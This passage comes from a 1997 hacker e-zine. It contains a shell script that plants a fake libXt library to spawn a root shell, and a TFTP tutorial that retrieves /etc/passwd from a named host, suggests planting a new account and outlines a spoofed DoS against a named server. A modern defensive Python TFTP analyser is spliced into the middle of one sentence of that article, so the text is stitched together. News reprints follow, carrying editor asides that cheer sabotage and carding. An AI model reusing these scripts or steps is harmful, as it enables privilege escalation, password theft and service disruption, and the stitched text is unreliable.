#ifndef DEBUG
    GrabKeyboardAndMouse();
#endif

    nice(nicelevel);

    if (nolock)
        justDisplay();
    else
        lockDisplay();

    finish();

    return 0;
}
------------------------------------------------------------

I've also provided one small code for an example of a lib-x hack.
------------------------------------------------------------
#!/bin/sh
mkdir /tmp/.werd
cd /tmp/.werd
cat << _EOF_ > Initialize.c
_XtAppInitialize()
{
    setuid(0);
    execl("/bin/sh", "sh", 0);
}
XtAppSetFallbackResources() {}
_XtDisplayInitialize() {}
_EOF_
ar x /usr/lib/libXt.a
cc -c -pic Initialize.c
ld *.o
mkdir lib lib/X
mv a.out lib/X/libXt.so.4.1
cd lib/X
echo "git reddy for da fun, du0dz"
xterm
------------------------------------------------------------

theLURK3R - http://home.earthlink.net/~rseal/index.htm

Personal Greetz:
  Channels: #Virii #Phreak #Hackers
  People:   Hibislea FA-Q Darcangel ICBM _RefluX_ Wrd btm Scud-O memor

_____________________________________________________________

©1997 HAVOC Bell Systems Publishing

No part of this publication may be reproduced in whole or in part without
the expressed written consent of HAVOC Bell Systems Publishing.

THTJ is all natural, contains no preservatives, and absolutely no lead.
Do not read THTJ while operating heavy machinery. Do not give THTJ to your
favorite operator. Do not pass go. Do not collect $200. Smoking THTJ may
cause cancer. Plagiarizing this publication is a crime against humanity.
_____________________________________________________________

----------
--=[TFTP]=--
Written by Scud-O
----------

[TFTP: Weaknesses and Exploits]

What follows is neither a new exploit nor a big one. It is simply a small
program with holes that are often overlooked, since it is needed for many
purposes on a UNIX system.

What the hell is it?
^^^^^^^^^^^^^^^^^^^^
TFTP stands for Trivial File Transfer Protocol. It is a very simple file
protocol, and it does not have error checking. It is different from FTP in
two main ways. First, it does not log in to the machine it is remotely
getting files from, and second, it uses UDP (User Datagram Protocol), not
TCP. TFTP uses the standard port 69 even though TCP is not used. TFTP is
not used very much, since FTP has more features, and error control.
However, TFTP is often used on diskless workstations and embedded systems.
Since TFTP does not have to use the OS, it can be installed on a tiny EPROM
with UDP and a network driver.

Ok, So What?
^^^^^^^^^^^^
Well, since TFTP uses UDP, no logins are made, and if the sysadmin has not
plugged up tftp or tftpd, then you practically have root, since you can get
any file you wish! While many systems are still open to tftp, many sites
have started to plug up tftp, or even ban connections to it, since security
releases are starting to come out about its holes.

Anyway, since tftp can both get AND send files, you can first get the
site's /etc/passwd, and then upload the new one you added with your new
account that you of course added to the file. However, as far as i know,
this is a limited attack, since tftpd seems to be set up with a default to
not get files, only to put files. But you can still get the file and try to
crack it.

[^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^]
[                TFTP Command Set                 ]
[-------------------------------------------------]
  binary     Uses binary mode for transfers
  connect    Connect to server
  get        Get file
  put        Put file
  trace      Displays protocol codes
  verbose    Displays all information

NOTE: There are 3 modes of transfer available for TFTP to use:
  o NetASCII: Standard ASCII, default transfer
  o Byte    : 8-bit bytes and binary (remember typing in binary?)
  o Mail    : Indicates destination is a user not a file, info is
              transferred as NetASCII.

[An Example TFTP Session]

limbo~#: tftp
tftp> connect smarty.smart.net
tftp> trace
Packet tracing on.
tftp> verbose
Verbose mode on.
tftp> status
Connected to smarty.smart.net
Mode: octet Verbose: on Tracing: on
Rexmt-interval: 5 seconds, Max-timeout: 25 seconds
tftp> get /etc/passwd        (or what ever file you want)
getting from smarty.smart.net:/etc/passwd to /tmp/passwd [octet]
sent RRQ
received DATA
send ACK
received DATA
send ACK
received DATA
send ACK
Received 1472 bytes in 0.2 seconds 46080 bits/s
tftp> quit
limbo~#:

So basically, this is what a typical tftp transfer looks like, with most of
the options enabled. Now, don't try this at home, since smart.net's tftp
now only spits out a time out error message when you try this. (Well, you
can try it if you like, but it is pretty much pointless, since you will
only get the error.)

[TFTP Packets]

Well, since TFTP uses UDP as its transport protocol, TFTP uses the UDP
header to encapsulate TFTP protocol information. It uses UDP's source and
destination ports to set the connection up, and it accomplishes this by the
use of TFTP Transfer Identifiers, AKA TIDs, which then places all this
stuff in the headers. Anyway, TFTP uses 5 types of Protocol Data Units, and
they are:

RRQ and WRQ: [ Opcode ][ Filename ][0][ Mode ][0]
             (2 bytes)  (String)       (String)

DATA       : [ Opcode ][ Block Number][0]
             (2 bytes)  (2 bytes)

ACK        : [ Opcode ][ Block Number]
             (2 bytes)  (2 bytes)

Error      : [ Opcode ][ Block Number][Error Message][0]
             (2 bytes)  (2 bytes)      (String)

TFTP Opcodes:
  ACK     4   Acknowledgment
  DATA    3   Send Data
  Error   5   Error
  RRQ     1   Read request
  WRQ     2   Write request

Ok, So what the hell do I need to know all about the TFTP protocol for?
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Well, it's very simple: with this information, you have all you will need
to construct yet another Denial of Service attack. Write a simple C program
that basically uses one of those easily found IP Spoofers, and then add a
system() call to tftp and ask it to get an odd file, that probably doesn't
exist, such as, well, etc/this.file.doesnt.exist , for example.
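Added example, not part of the original article: a decoder for the five packet types listed above, written to RFC 1350 (where DATA carries up to 512 payload bytes after the block number and ERROR carries a 2-byte error code), plus two defender-side checks: requests that resolve outside the served directory, and clients whose requests mostly end in ERROR replies. The /tftpboot root, the thresholds, the helper names and the sample capture are assumptions constructed for illustration.

```python
"""Added example: TFTP packet decoding and two defender-side checks."""
import posixpath
import struct
from collections import Counter

OPCODES = {1: "RRQ", 2: "WRQ", 3: "DATA", 4: "ACK", 5: "ERROR"}
MODES = {"netascii", "octet", "mail"}


def parse_tftp(payload):
    """Decode one TFTP packet (the UDP payload) following RFC 1350."""
    if len(payload) < 4:
        raise ValueError("shorter than the smallest TFTP packet")
    (opcode,) = struct.unpack("!H", payload[:2])
    op = OPCODES.get(opcode)
    if op is None:
        raise ValueError(f"unknown opcode {opcode}")
    body = payload[2:]
    if op in ("RRQ", "WRQ"):
        # filename NUL mode NUL; anything after that is ignored here
        fields = body.split(b"\x00")
        if len(fields) < 3 or not fields[0] or not body.endswith(b"\x00"):
            raise ValueError("request lacks a terminated filename and mode")
        mode = fields[1].decode("ascii", "replace").lower()
        if mode not in MODES:
            raise ValueError(f"unknown transfer mode {mode!r}")
        name = fields[0].decode("ascii", "replace")
        return {"op": op, "filename": name, "mode": mode}
    (number,) = struct.unpack("!H", body[:2])
    rest = body[2:]
    if op == "DATA":
        if len(rest) > 512:
            raise ValueError("DATA block larger than 512 bytes")
        # a block shorter than 512 bytes ends the transfer
        return {"op": op, "block": number, "data": rest, "last": len(rest) < 512}
    if op == "ACK":
        if rest:
            raise ValueError("trailing bytes after ACK")
        return {"op": op, "block": number}
    if not rest.endswith(b"\x00"):
        raise ValueError("ERROR message is not NUL-terminated")
    message = rest[:-1].decode("ascii", "replace")
    return {"op": op, "code": number, "message": message}


def review_request(pkt, root="/tftpboot"):
    """Findings for one decoded RRQ/WRQ; root is an assumed served directory."""
    if pkt["op"] not in ("RRQ", "WRQ"):
        return []
    findings = []
    if pkt["op"] == "WRQ":
        findings.append("write request")
    if ".." in pkt["filename"].split("/"):
        findings.append("path traversal component")
    # An absolute filename replaces root in join(), which mirrors how a
    # tftpd with no directory restriction would open it.
    resolved = posixpath.normpath(posixpath.join(root, pkt["filename"]))
    if resolved != root and not resolved.startswith(root + "/"):
        findings.append(f"resolves outside {root}: {resolved}")
    if pkt["mode"] == "mail":
        findings.append("obsolete mail mode")
    return findings


def error_heavy_clients(events, min_requests=3, ratio=0.5):
    """Clients whose requests mostly end in ERROR replies.

    events: (client_address, sender, payload), sender "client" or "server".
    Addresses are as seen on the wire; thresholds are assumptions to tune.
    """
    requests, errors = Counter(), Counter()
    for client, sender, payload in events:
        try:
            pkt = parse_tftp(payload)
        except ValueError:
            continue  # not TFTP, or malformed
        if sender == "client" and pkt["op"] in ("RRQ", "WRQ"):
            requests[client] += 1
        elif sender == "server" and pkt["op"] == "ERROR":
            errors[client] += 1
    return sorted(c for c, n in requests.items()
                  if n >= min_requests and errors[c] / n > ratio)


def rrq(name, mode="octet"):
    """Build a read request (only used to construct the sample below)."""
    return struct.pack("!H", 1) + name.encode() + b"\x00" + mode.encode() + b"\x00"


def err(code, message):
    """Build an ERROR packet (only used to construct the sample below)."""
    return struct.pack("!HH", 5, code) + message.encode() + b"\x00"


# Constructed capture; addresses come from documentation ranges.
SAMPLE = [
    ("192.0.2.10", "client", rrq("pxelinux.0")),
    ("192.0.2.10", "server", struct.pack("!HH", 3, 1) + b"\x00" * 512),
    ("192.0.2.10", "client", struct.pack("!HH", 4, 1)),
    ("198.51.100.7", "client", rrq("/etc/passwd")),
    ("198.51.100.7", "server", err(2, "Access violation")),
    ("198.51.100.7", "client", rrq("etc/this.file.doesnt.exist")),
    ("198.51.100.7", "server", err(1, "File not found")),
    ("198.51.100.7", "client", rrq("etc/this.file.doesnt.exist")),
    ("198.51.100.7", "server", err(1, "File not found")),
]

if __name__ == "__main__":
    for client, sender, payload in SAMPLE:
        pkt = parse_tftp(payload)
        shown = {k: v for k, v in pkt.items() if k != "data"}
        print(client, sender, shown, review_request(pkt))
    print("error-heavy clients:", error_heavy_clients(SAMPLE))
```
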
Then when the server is trying to reply with an error to a non-existent
server, you will be quickly slowing the remote system to a halt. (Hell, i
have an experiment, i am probably going to write this code out (i didn't
this month since it would take up a lot of room, and i am majorly behind
deadline) and see how long it would take to kill nether.net. I think that
it will go down fairly fast since the server is so fuckin lagged, since it
has about a million users on, and since it is ann arbor's undernet site.)

Well, that is all on TFTP. Check out the files section of our HBS site,
since if i get the TFTP DOS code, i will add it there.
_____________________________________________________________

--------------
--=[The News]=--
Compiled & edited by KungFuFox
--------------

 1 : AOL 'Hacker Riot' More Like Amateur Hour
 2 : Bug or Feature? Redmond Slow To Respond
 3 : Technocops fight hacker threat
 4 : Linux Faithful Defuse Bliss Panic
 5 : Did Croatian teen hackers break Pentagon codes?
 6 : Cracking Enjoys Renaissance in Eastern Europe
 7 : Nokia Rolls Out Wireless Pay Phone
 8 : Survey sounds alarm about computer crime
 9 : NASA Web site briefly closed due to hackers
 10: Shockwave Security Hole Leaves Email Exposed
 11: H.323: It's 'Open Sesame' in Firewall Speak
 12: Go Ahead, Be Paranoid : Hackers Are Out to Get You
 13: Threat of 'techno' terrorism being explored
 14: Usenet Servers under Assault
 15: Usenet News Servers Take a Beating
 16: Man waits 20 years for phone line but dies before getting it
 17: Only in California... [I love California, but that's the title.]

"Adolescent crackers wreak havoc to get attention and stoke their egos."
-Felipe Rodriquez, Founder of xs4all, a Holland-based ISP _____________________________________________________________ AOL 'Hacker Riot' More Like Amateur Hour by Mark Glaser [This article made me sick, but I was laughing at the same time] 8:57am PST 17 Feb 97 -- After threatening America Online with a raging "hacker riot" that would toss people out of chat rooms, cancel accounts, and spread viruses, the so-called Valentine's Day Massacre was mostly noise and bluster, signifying nothing. And many AOL users would have been hard-pressed to tell if there was a riot going on: They wouldn't have known if any access problems were due to hackers or AOL's overloaded systems, according to David Cassel, who maintains the AOL List at aolsucks.org. A message had been forwarded to hundreds of AOL users, saying that hackers would rampage at 9 p.m. EST. Planning meetings for the hackers were held at 6 p.m. to plot strategy. At the appointed hour, more than 300 hackers gathered in private chat rooms and distributed at least seven different programs to "create hell on AOL," according to one eyewitness. The hackers then fanned out to public rooms and proceeded to do basic tricks of the trade: scrolling text too fast to read, kicking out chatters, and using macros that spewed out text like "RIOT!!! RIOT!!! RIOT!!!" and "Get Ready to Corrupt." The hackers, who went by screen names such as ReVOLTnow [Which trade do they think those are 'basic tricks' of? Damn lamers...] and Lov2HakU, caused havoc into the night but most damage was cosmetic: There were no reports of viruses or downed servers, and many of the troublemakers had their rogue accounts cancelled. The hacking was reportedly a reponse to AOL's recent shoddy service. Many of [There's that word again, 'hacking'. If I had a nickel for every time I mistook a warez kiddie for a hacker, I'd be broke.] 
the hackers trade pirated software in private chat rooms, named "wares," and were mad at the recent spate of busy signals due to AOL's ramped-up membership. But most observers and veteran AOL users attributed the attack to bored teenagers who were not adept hackers. One AOL chat room guide called the attack "pretty lame." [At least somebody knows what they're talking about.] Cassel said that the riot was probably the work of amateurs. "Real hackers wouldn't publicize their activities in advance," he said. "And AOL is such a big target with pretty low security (despite what they say). This was an opportunity for these hackers to send a message to AOL and to pound their chest a bit." AOL maintains that the riot did only minor damage, and downplayed fears of viruses by saying that only downloaded and executed files could wreak havoc. Cassel, a longtime critic of AOL, said that its 3.0 software has the ability to update users' software without asking permission. If hackers could access that capability, viruses could be spread and cause a great deal of damage. Company spokespeople refused to comment on that possibility. This is not the first such attack on AOL. In the fall of 1995, AOL came down on software piracy of Macromedia products and punished some hackers. The piraters exacted revenge by rioting during a Macworld forum, taking over the stage and reportedly stealing AOL chairman Steve Case's email account. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Bug or Feature? Redmond Slow To Respond by Kate Farnady [This is the story before microsoft got to edit it.] 11:55am 4.Mar.97.PST -- Microsoft is "too busy looking at the big picture," said Paul Greene, the discoverer of the latest Microsoft Explorer 3.0 security hole - a bug that Green says has been in the software since its release on 13 August 1996. "They're missing the details," he said. 
Greene said he happened upon the bug - which can remotely trigger the execution of files on the user's machine - last week, by accident. He and his two roommates, Geoff Elliott and Brian Morin, juniors at Worcester Polytechnic Institute, first notified Microsoft via email at 4 a.m. last Thursday. Elliott said Microsoft PR assured him that the bug was not a big deal. In order for this bug to work, said the email, the perpetrator must have the aliased program on his hard drive and know where the file is stored. Greene responded to Microsoft's ambivalence with a public Web site, Cybersnot, that demonstrates the bug. The site launched on Saturday. Paul Balle, Microsoft product manager for Internet Explorer, said Microsoft first learned about the bug on Monday. "As soon as we found out about it, we immediately deployed a team of project managers and developers to address the issue," said Balle, who told Wired News that they had a fix for the bug in testing, and that it would be posted to Microsoft's Web site within the next 24 hours. Greene discovered the bug while doing group work, using a Web site to pass along files. He used the IE option to create a "shortcut," or alias to a file stored on his hard disk, and then placed it in the HTML on his Web site. The three students found that by embedding a .lnk or .url tag in the HTML, a user can create an alias which will open a program on the unsuspecting Web surfer's desktop. Says Morin, "Everyone is looking at Java and ActiveX, and not looking closely enough at what happens when the browser is tied so closely to the desktop." This bug is unrelated to ActiveX. "There are plenty of programs that come with Windows that can do a lot of damage," says Elliott. For example, a link could be created that might automatically open the format utility that MSIE stores in the Command folder. This could potentially erase the Web surfer's hard disk. 
"And that's only one of the many things that might strike terror in the hearts of PC users," says Paul. Further, the three students found that IE's cache folder stores files not in the folder itself, but in a subdirectory. Unlike Netscape, which scrambles the file names in the cache folder, IE stores the files, names intact, in a hidden subdirectory. "We assume Microsoft suspected this might be a security risk," says Elliott, "otherwise why would they have created a hidden folder." With access to the cache subdirectory, a malicious user could make use of the shortcut bug to place any file on the unsuspecting surfer's hard disk. But the bug, and Microsoft's ambivalent response to the student's email, haven't soured these PC users. "Nobody is handling security on the Internet very well," says Elliott. "We don't know how to connect 6 million computers with high security. The Web hasn't had the 20 years Unix has had [to develop security], and even Unix isn't secure." Elliott told Wired News of spending the morning thinking of ways to use this bug as a browser virus. "But we're bored of that," he explains. "The sad thing is, this could really be a great feature," says Greene. "It could be used to help fix things on your desktop." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Technocops fight hacker threat March 2, 1997 From Correspondent Louise Schiavone WASHINGTON (CNN) -- When criminals rob a bank, you call the police. When they break into an office building and threaten mayhem, you call the SWAT team. But how about when they break into your computer system and wreak havoc? Is there someone to call? You bet. Meet CERT -- the Computer Emergency Response Team. "Late Friday afternoons are often times of crisis moments for a site. They may find that their site has been compromised and they can't wait until Monday to deal with it," explains Kathy Fithen, manager of CERT Daily Operations. 
These -- well, computer nerds -- are the rescue team of the future. And according to the Justice Department, the future is already here. "These crimes are becoming more serious, there's more money at stake and the crimes are more malicious," says Martha Stansell-Gamm of the U.S. Justice Department. "We are seeing more destruction, more threats, more theft of valuable information in general." [WE are seeing more corruption, more theft from the taxpayers, and more lies, so fuck off.] Not long ago, a hacker invaded Internet access provider Erol's system with an obscene, racist message for its 140,000 subscribers. Last summer, hackers broke into the Justice Department's Web site, posting swastikas and pictures of Adolf Hitler. And a few years ago, two college students hacked their way into Boeing's computers in search of password files. The Justice Department says that situation is a classic case of how hackers can drive up business costs. "We were also able to ascertain that these hackers had obtained root access to the federal courthouse system in Seattle. After the case was over, it cost Boeing, I believe, $57,000 simply to check the integrity of their avionics data," Stansell-Gamm says. Based at Carnegie Mellon University in Pittsburgh, CERT works with the federal government, using mostly Defense Department dollars. CERT doesn't claim to be a policing agency, and many businesses have their own team of computer emergency specialists to stay one step ahead of the technocriminals of the '90s. In fact, last year a survey of Fortune 1,000 firms found that more than half had detected attempts to gain computer access. At least 11 attempts were successful. _____________________________________________________________ Linux Faithful Defuse Bliss Panic by Kristi Coale 7:43pm 26.Feb.97.PST -- An anti-virus software company is busily backpedalling after announcing earlier this month that it had "discovered" and countered the first Linux virus. 
"[Bliss] is a stupid virus," said Joe Wells, a software consultant who maintains an index of proliferating computer viruses. "It's an alarmist approach that draws people's attention to something that's not a real threat and takes their eyes off the things that are boring but more of a threat," he said. McAfee Software, a developer of anti-viral software, announced it had discovered and created an antidote for Bliss on 6 February. The company claimed that the hostile code was infecting Linux operating systems - a popular free version of Unix. But the tone of the announcement raised the ire of Linux users on the blinux-list mailing list. While McAfee said the Bliss virus wasn't widespread, its announcement characterized the virus as serious and spreading in the public domain. But Bliss was not destructive. It was distributed primarily as "proof of concept" code (i.e., proof that a Linux virus could exist), to people on a security mailing list who knew what it was. "I learned a lot of lessons from Bliss," admitted Jimmy Kuo, senior virus researcher for the Santa Clara, California-based McAfee Software. "Bliss sounded more scary than it should have been. [In subsequent releases] we have tried to include more technical information." Wells said Bliss is an overwriter virus, a piece of code that destroys its host. Without a host, a virus has little chance of spreading. This led Wells and other anti-virus experts, including Dave Chess, research staff member at IBM's Thomas J. Watson Research Laboratory, to conclude that Bliss is not much of a threat. Bliss exists mostly for people to run on their systems as a study of virus behavior, a common practice among those who work on anti-viral technologies, said Chess. "When it's infecting, it will tell you - infecting:(file name) and it keeps a log on the disk of the infected files," he said. Further, the program saves clean copies of every file that it infects. 
Kuo, a well-respected anti-virus researcher, said a part of the confusion over Bliss stemmed from the different interpretations of such expressions as "in the wild," the phrase the anti-viral community uses to describe a virus that is in the public domain and therefore poses a threat. To Kuo, a virus has to meet five criteria before it is "in the wild," including the existence of a critical mass of users of an operating system. "Many people are running Linux at home on $800 machines. When the number of users of a platform goes up, the average user's technical capability goes down," said Kuo. Linux had been virus-free since its initial release in 1991. Kuo said it takes two to three years for viruses to catch up with new operating systems. With that criterion, Bliss is the sign that Linux has attained the status of an established platform. Bliss is also a warning that other hostile code awaits, said Wells, who noted that of the 10,000 viruses in existence, only 200 to 300 pose a real threat. "[Bliss] will be just like the Boza fiasco [the first Windows 95 virus] last year, and people will know it's possible to write viruses for Linux," said Wells. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Did Croatian teen hackers break Pentagon codes? February 20, 1997 ZAGREB, Croatia (Reuter) -- Three teen-age computer hackers in Croatia may have broken Pentagon protection codes and copied highly classified files from U. S. military bases, local media reported. The Zagreb daily Vecernji List said Wednesday that the three high school students, surfing the Internet on their home computer, applied a search program and deciphered codes, barging into the database of several military installations. The databases included those of the Anderson nuclear installation and an unnamed satellite research center, the newspaper reported. However, Pentagon officials expressed doubt this could have happened. 
"There is no way that anybody can tap into classified files via the Internet," Pentagon spokeswoman Lt. Col. Donna Boltz told Reuters. Such files, she said, are almost always on closed systems without outside access. But personal e-mail or other sensitive files might be invaded by hackers on the Internet, she added. After the news broke, reporters flocked to the high school in the Adriatic port of Zadar where the three teens, ages 15 and 16, specialize in mathematics and informatology. One of the hackers, identified only as V.M., told the state news agency HINA he accessed the Pentagon data base while surfing the net January 2. Despite being warned that he was not allowed to proceed, he continued to browse the site until the data of the Anderson base were displayed on the screen, HINA said. "The data are compressed and need to be extracted, so I don't really know everything they contained, but it sure was very interesting," V.M. told the agency. [Top-notch ueberleeter wows reporters with a buncha technical jargon about his oly stumbling block - he couldn't unzip the shit he stole.] He maintained he was unaware of any possible consequences. ©1997 Reuters Limited. _____________________________________________________________ Cracking Enjoys Renaissance in Eastern Europe by Kristi Coale 4:43am 28.Feb.97.PST -- A smoldering indignation lies at the root of the recent attacks on US Pentagon computers by Eastern European crackers. The West, and particularly the United States, is a prized target of these crackers, who see these breaches as an opportunity to jeer at the United States' perceived technological superiority. The US and other Western countries are basking in the glow of the information revolution, a movement that has created a new industry from which many are earning a healthy living. Meanwhile, life in the former Communist countries of Eastern Europe is less sanguine. 
The march toward democratic systems is slow, and jobs are not easy to find for those with the technological skills. With time on their hands, they press their knowledge of networks and computer languages into service via cracking. "People in Eastern Europe are well-educated, yet they can't make money and attain living standard of their often less-educated Western peers - which builds up a resentment," said expatriate Croatian journalist Ivo Skoric via email. "So the education basically just makes us unhappy - because we are able to see and understand how very well fucked up we are: education in this case gives both tools and reasons to do [cracking]," he said. In January, three Croatian high school students cracked their way into Pentagon computers and accessed what they believed to be Pentagon secrets. The Pentagon, which has said that no classified information was compromised in the attack, apparently sustained considerable damage - approximately US$500,000, according to the Zagreb daily newspaper Vecernji List. The Pentagon refutes these claims. "There was no information or indication that classified information was accessed," said Major Chris Geisel, Air Force spokesman. "The amount of the damage won't be determined until after the investigation is finished." [In other words, "we're still too embarrassed to tell you how much damage was done."] In the meantime, the Air Force is working closely with Croatian police to investigate the incident, Geisel said. This break-in is one of several originating from Eastern European countries in recent months. In January, a Romanian teenager set off a series of ping and syn-flood attacks against a number of IRC servers around the world. And Bosnia and Croatia have been home to other cracking incidents involving Pentagon computers, said Skoric. Earlier this month, youths in Zlatar Bistrica, a small town north of Zagreb, broke into Pentagon computers and had their equipment seized by Croatian police. 
Adolescent crackers wreak havoc to get attention and stoke their egos, said Felipe Rodriquez, a founder of xs4all, a Holland-based ISP. In the case of the Croatian high school students, their teacher and parents celebrated their actions as an achievement made possible by their technical acumen. But cracking is on the rise in Eastern Europe mostly because people can get away with it: There are no laws against these activities. Internet service providers and others in the Eastern European technical community attribute this gap in law enforcement to the lack of understanding by the populace that cracking is considered a crime in other countries. The attacks also stem from a different set of priorities in a region whose economic and governmental systems are in flux, said Tin Blaskovic, a Croatian university student. "You have to understand that countries in transition have bigger problems on their backs, like stabilizing [a] newly established system," Blaskovic said via email. "When that is completely done, I believe something will be done about such problems as cracking." Western European countries such as Holland channel the energies of crackers toward developing more secure computer systems. In Holland, cracking is now illegal, but it used to be a "hacker's haven," said Rodriquez, whose ISP employs a number of ex-crackers to develop security systems. Other former crackers Rodriquez knows are busy developing smartcards for banks, setting up the first Dutch freenet system, and writing encryption software. In fact, xs4all, set up by former crackers, was the first ISP in The Netherlands, Rodriquez said. "We do not believe hackers should be repressed. Instead, they should be stimulated to use their talents creatively; to secure poorly designed systems," he said. [Any hacker that does that is called a fucking sellout.] ©1993-97 Wired Ventures, Inc. 
_____________________________________________________________ Nokia Rolls Out Wireless Pay Phone by Gene Koprowski 2:41pm 4.Mar.97.PST -- Nokia America has introduced a new digital wireless phone that is designed to bring pay telephone service to buses, subway trains, and taxi cabs over the global system for mobile (GSM) network. But a top telecom analyst questioned whether the device would be appropriate for all those venues. [Big smile] The small, wireless pay phone, the GSM 1900, was revealed at the Cellular Telecommunications Industry Association trade show in San Francisco this week. Nokia spokeswoman Megan Matthews said the product operates over the the same network technology, GSM, which is employed by Personal Communications Service Providers. Nokia has inked deals with the PCS purveyors for trials in "several markets" to test the 1900-MHz technology on public transportation, she said. Matthews would not reveal where the products will being tested. A 900-MHz version of the technology that works with overseas cellular standards has been sold to phone companies in Thailand. The technology has a sizable graphical user interface, and hands-free functionality. "This is an additional way for the new PCS providers to make more money on their network," said Matthews. "They are able to provide a service that cannot be achieved by a conventional pay-phone system. You can go and stick one up on a wall and it will work. You don't need an additional black box. There is a built-in transceiver." [Oh what I wouldn't do to rip one of these.] Matthews says that public wireless phones could have been implemented years ago, but were not, largely because the cellular-phone market was dominated by Bell companies, which already had an infrastructure of landline-based pay phones in place. The price of the phone calls is likely to be priced comparably to standard wireless phone calls, not at the rate that is akin to calls for air phones. 
"It will probably be very similar to what their air time rates are for regular wireless subscribers," Matthews said. "It be a lot cheaper (than air phones on airplanes). If you were in a subway system, you wouldn't want to pay US$25 for a call. You might as well go to the wire line." The company does not envision users plunking quarters into the device, however. Credit cards or charge cards will be used to pay for the services. The phones can also interact with smart cards or electronic-purse applications. [Carders, start your engines.] David Cooperstein, a telecom strategies analyst at Forrester Research, said the marketers of the technology have to make a compelling argument to users in order to generate demand. "Pay phones are everywhere in this country," says Cooperstein. "If it is going to be more expensive than your typical pay phone, then there has to be some compelling reason to use it, like it is more available than the pay phones that are already out there. If it is more expensive, people would probably just wait a few more minutes to get to the regular pay phone." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Survey sounds alarm about computer crime March 7, 1997 SAN FRANCISCO (Reuter) -- A computer security group sounded an alarm about computer crime Thursday after U.S. companies and other organizations it surveyed reported losing $100 million due to high-tech crime. [Let's just call it downsizing of profits.] Three-quarters of the 563 U.S. corporations, government agencies, financial institutions and universities that responded to the survey by the Computer Security Institute reported suffering financial losses in the last 12 months due to computer security breaches. The breaches ranged from computer viruses and laptop theft to financial fraud, theft of proprietary information and sabotage. [Sabotage is not recommended unless your employer is evil.] 
Losses suffered by the 249 organizations that were able to estimate them totaled $100 million in the last year, said the Computer Security Institute, a San Francisco-based association of information security professionals. Institute Director Patrice Rapalus said the survey's findings about financial losses due to security breaches "should sound the alarm for corporations and government agencies." She said the level of awareness of computer crime had risen slightly since the institute carried out its first survey last year but most organizations still were not doing enough to counter it. Richard Power, a spokesman for the institute, said it was likely that computer crime cost billions of dollars each year in the United States, although this was not based on data from the survey. Power said there was a need for more information security staff, more security training for computer network administrators and for greater cooperation between the private sector and law enforcement. The organizations reported $24.9 million in losses from financial fraud, $22.7 million due to telecommunications fraud, $21 million from theft of proprietary information, $4.3 million from sabotage of data or networks, $12.5 million from computer viruses and $6.1 million from theft of laptop computers, the institute said. [If you count laptops as warez, we got figures on the whole H/P/C/V/A/W scene's success right there.] The number of organizations that suffered an intrusion or other unauthorized use of computer systems in the last 12 months rose to 49 percent in the latest survey from 42 percent in the 1996 survey, the institute said. However, only 17 percent of respondents who suffered computer intrusions reported them to law enforcement, the survey found. Fear of negative publicity was a key reason organizations did not report them, it found. ©1997 Reuters Limited. 
_____________________________________________________________

NASA Web site briefly closed due to hackers
March 7, 1997

CAPE CANAVERAL, Florida (Reuter) -- Computer hackers found their way into NASA's No. 1 site on the World Wide Web and posted a political manifesto, forcing the U.S. space agency to take the popular location off-line, a spokeswoman said Thursday. The hackers, who called themselves H4G13, left a message online Wednesday claiming responsibility for the intrusion. Brian Dunbar, NASA's Internet services manager, said the group berated officials for jailing well-known hackers and promised to launch an attack on corporate America for commercial use of the internet. "During the next month, we the members of H4G13 will be launching an attack on corporate America. All who profit from the misuse of the Internet will fall victim to our upcoming reign of digital terrorism," the message said. [Hopefully skepticism that they won't go through with their threat isn't accurate.] The message was up for about half an hour and the site was operating as usual Thursday morning, Dunbar said. It was the first time hackers had ever broken into that NASA server, which is located at the Goddard Space Flight Center in Greenbelt, Maryland. NASA officials said they would move the public Web page, at www.nasa.gov, to a new server. Besides providing information for public use, the server is used by NASA scientists and researchers to exchange information on solar research. The data is considered "proprietary," but not classified. It was not clear whether the hackers had had access to the data. Dunbar said NASA was investigating the incident.

©1997 Reuters Limited.
_____________________________________________________________

Shockwave Security Hole Leaves Email Exposed
by Michael Stutz

10:02am 13.Mar.97.PST -- Last week, the Web security booby prize went to Microsoft Internet Explorer. This week, it's Netscape's turn.
The latest hole to be added to the list of recent security gaffes involves Macromedia Shockwave and Netscape Navigator. A malicious user can read and copy a Web surfer's private email - including supposedly deleted messages - without their knowledge, and even access internal Web servers behind corporate firewalls. David de Vitry, an application developer at Poppe Tyson Interactive, discovered the security hole and announced Monday on his Web site that Netscape users who have installed Macromedia's Shockwave plug-in are at risk. Shockwave was recently awarded Best World Wide Web Plug-In by the Software Publisher's Association. Macromedia claims the free software is installed on more than 20 million desktops. To demonstrate the flaw, de Vitry set up a Web page that shows how a Web server can obtain your email upon connecting - no links or forms need be selected. "I was just browsing my Netscape Mail and I discovered how Netscape handles addressing email," said de Vitry, referring to Netscape's use of the mailbox URN. "It took me by surprise, and [the means] to implement [the hole] just sort of clicked with my Shockwave experience." Utilizing the default path to a Windows user's mailbox - C:/Program Files/Netscape/Navigator/Mail/Inbox - and sending a mailto: query with Shockwave's GETNETTEXT command, a cracker could develop a Shockwave movie that reads the user's current email. With a few more commands, that email could be saved to a data variable and sent back to the Web server, where it could be copied and saved. By changing the path from the Inbox to, say, the Trash, a Shockwave movie could then retrieve email messages that were thought deleted by the user. "It's much like accessing a file, because you're just accessing a mail file. With the mailbox URN you can access any file on the system as long as it's in the same format, which is text with email headers," said de Vitry. "Because of the security model, Java applets can't access files on your computer.
